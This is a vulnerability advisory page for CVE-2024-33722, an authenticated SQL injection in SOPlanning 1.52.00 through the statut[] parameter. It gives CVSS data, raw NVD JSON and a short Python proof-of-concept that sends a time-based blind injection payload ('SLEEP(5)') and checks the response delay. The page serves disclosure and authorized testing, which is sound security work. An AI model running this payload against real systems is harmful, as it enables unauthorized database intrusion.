Security Vulnerability Report
中文
CVE-2024-33722 CVSS 6.3 MEDIUM

CVE-2024-33722

Published: 2026-05-08 06:16:09
Last Modified: 2026-05-08 18:16:32

Description

SOPlanning 1.52.00 is vulnerable to SQL Injection by an authenticated user via projets.php with statut[].

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SOPlanning <= 1.52.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration url = "http://target/soplanning/projets.php" # Requires a valid authenticated session (cookies) cookies = { "soplanning_session": "valid_session_cookie_here" } # Malicious payload targeting the 'statut[]' parameter # This payload attempts a time-based blind injection payload = { "statut[]": "1' AND (SELECT SLEEP(5))-- -" } try: response = requests.post(url, data=payload, cookies=cookies, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed: SQL Injection detected via statut[] parameter.") else: print("[-] Injection failed or not vulnerable.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-33722", "sourceIdentifier": "[email protected]", "published": "2026-05-08T06:16:09.417", "lastModified": "2026-05-08T18:16:32.147", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOPlanning 1.52.00 is vulnerable to SQL Injection by an authenticated user via projets.php with statut[]."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/fuzzlove/soplanning-1.52-exploits", "source": "[email protected]"}]}}